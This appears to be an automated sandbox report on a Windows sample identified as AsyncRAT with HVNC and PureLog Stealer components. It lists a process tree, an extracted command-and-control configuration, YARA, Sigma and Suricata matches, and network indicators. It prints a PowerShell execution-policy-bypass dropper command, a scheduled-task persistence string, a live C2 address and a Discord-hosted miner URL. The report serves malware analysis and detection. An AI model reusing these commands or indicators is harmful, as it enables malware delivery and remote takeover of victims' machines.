Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AsyncClient.exe

Overview

General Information

Sample name:AsyncClient.exe
Analysis ID:1574525
MD5:da0c2ab9e92a4d36b177ae380e91feda
SHA1:44fb185950925ca2fcb469fbedaceee0a451cbca
SHA256:c84a91d4261563b4171103a1d72a3f86f48ec2eaca6e43d7f217bdcbc877124d
Tags:AsyncRATexeuser-lontze7
Infos:

Detection

AsyncRAT, HVNC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected HVNC
Yara detected Powershell download and execute
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Explorer NOUACCHECK Flag
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AsyncClient.exe (PID: 4300 cmdline: "C:\Users\user\Desktop\AsyncClient.exe" MD5: DA0C2AB9E92A4D36B177AE380E91FEDA)
    • cmd.exe (PID: 4628 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2852 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • hklugq.exe (PID: 3800 cmdline: "C:\Users\user\AppData\Local\Temp\hklugq.exe" MD5: 5890798F97F9144206499433A5DB3011)
          • explorer.exe (PID: 2068 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
          • hklugq.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Local\Temp\hklugq.exe" MD5: 5890798F97F9144206499433A5DB3011)
            • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • explorer.exe (PID: 3392 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Pandora RAT, Pandora hVNC RATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat

Malware Configuration

Threatname: AsyncRAT

{"Server": "82.64.156.123", "Port": "80", "Version": "0.5.8", "MutexName": "9mzImB3NUR0Q", "Autorun": "false", "Group": "null"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
AsyncClient.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    AsyncClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      AsyncClient.exeWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xa257:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xb638:$a2: Stub.exe
      • 0xb6c8:$a2: Stub.exe
      • 0x6e70:$a3: get_ActivatePong
      • 0xa46f:$a4: vmware
      • 0xa2e7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x7c8b:$a6: get_SslClient
      AsyncClient.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xa2e9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0xa0e9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_HVNCYara detected HVNCJoe Security
          0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 20 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.AsyncClient.exe.630000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                0.0.AsyncClient.exe.630000.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                • 0xa257:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                • 0xb638:$a2: Stub.exe
                • 0xb6c8:$a2: Stub.exe
                • 0x6e70:$a3: get_ActivatePong
                • 0xa46f:$a4: vmware
                • 0xa2e7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                • 0x7c8b:$a6: get_SslClient
                0.0.AsyncClient.exe.630000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                • 0xa2e9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                0.2.AsyncClient.exe.3ae89a8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.AsyncClient.exe.69c0000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 14 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Explorer NOUACCHECK Flag
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 3392, ProcessName: explorer.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , ProcessId: 2852, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' , ProcessId: 2852, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 500, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T11:58:53.411663+010020355951Domain Observed Used for C2 Detected82.64.156.12380192.168.2.849704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T11:58:53.411663+010020356071Domain Observed Used for C2 Detected82.64.156.12380192.168.2.849704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T11:58:53.411663+010028424781Malware Command and Control Activity Detected82.64.156.12380192.168.2.849704TCP
                    2024-12-13T11:59:02.195658+010028424781Malware Command and Control Activity Detected82.64.156.12380192.168.2.849706TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: AsyncClient.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Found malware configuration
                    Source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "82.64.156.123", "Port": "80", "Version": "0.5.8", "MutexName": "9mzImB3NUR0Q", "Autorun": "false", "Group": "null"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeReversingLabs: Detection: 75%
                    Multi AV Scanner detection for submitted file
                    Source: AsyncClient.exeReversingLabs: Detection: 86%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: AsyncClient.exeJoe Sandbox ML: detected
                    Source: AsyncClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: AsyncClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 82.64.156.123:80 -> 192.168.2.8:49704
                    Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 82.64.156.123:80 -> 192.168.2.8:49704
                    Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 82.64.156.123:80 -> 192.168.2.8:49704
                    Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 82.64.156.123:80 -> 192.168.2.8:49704
                    Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 82.64.156.123:80 -> 192.168.2.8:49706
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: AsyncClient.exe, type: SAMPLE
                    Source: Yara matchFile source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTR
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewASN Name: PROXADFR PROXADFR
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: unknownTCP traffic detected without corresponding DNS query: 82.64.156.123
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: google.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: hklugq.exe, 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883203492.0000000001123000.00000004.00000020.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/4v
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/t
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: svchost.exe, 00000006.00000002.3231773867.00000232E7400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: AsyncClient.exe, 00000000.00000002.3882545170.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: AsyncClient.exe, 00000000.00000002.3888273667.0000000004E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: AsyncClient.exe, 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: hklugq.exe, 0000000B.00000002.3883941364.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/859410781241475093/907881277804400691/ETHMiner.exe0
                    Source: hklugq.exe, 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/859410781241475093/907881277804400691/ETHMiner.exei/c
                    Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000006.00000003.1590978651.00000232E7250000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                    Source: hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/A6jEbUB.png

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: AsyncClient.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: AsyncClient.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: AsyncClient.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    .NET source code contains suspicious base64 encoded strings
                    Source: hklugq.exe.0.dr, DarksProtectorD3eu6PcbZm91S53n53555a2377zss1P81R24r6j7M72O2H22m6MA283DarksProtector.csBase64 encoded string: System.Security.
                    Source: hklugq.exe.0.dr, DarksProtectorD3eu6PcbZm91S53n53555a2377zss1P81R24r6j7M72O2H22m6MA283DarksProtector.csBase64 encoded string: System.Net
                    .NET source code contains very large strings
                    Source: hklugq.exe.0.dr, DarksProtectorD3eu6PcbZm91S53n53555a2377zss1P81R24r6j7M72O2H22m6MA283DarksProtector.csLong String: Length: 315392
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028CC1A00_2_028CC1A0
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028C65C00_2_028C65C0
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028CBE400_2_028CBE40
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028C5CF00_2_028C5CF0
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028CC1900_2_028CC190
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028CA7A80_2_028CA7A8
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028C59A80_2_028C59A8
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_028CBE2F0_2_028CBE2F
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06ABA2B80_2_06ABA2B8
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06AB9A980_2_06AB9A98
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06ABA2A80_2_06ABA2A8
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B68C980_2_06B68C98
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B64A980_2_06B64A98
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B673180_2_06B67318
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B6A0900_2_06B6A090
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B629480_2_06B62948
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B63F800_2_06B63F80
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B6ADB00_2_06B6ADB0
                    Source: C:\Users\user\Desktop\AsyncClient.exeCode function: 0_2_06B611700_2_06B61170
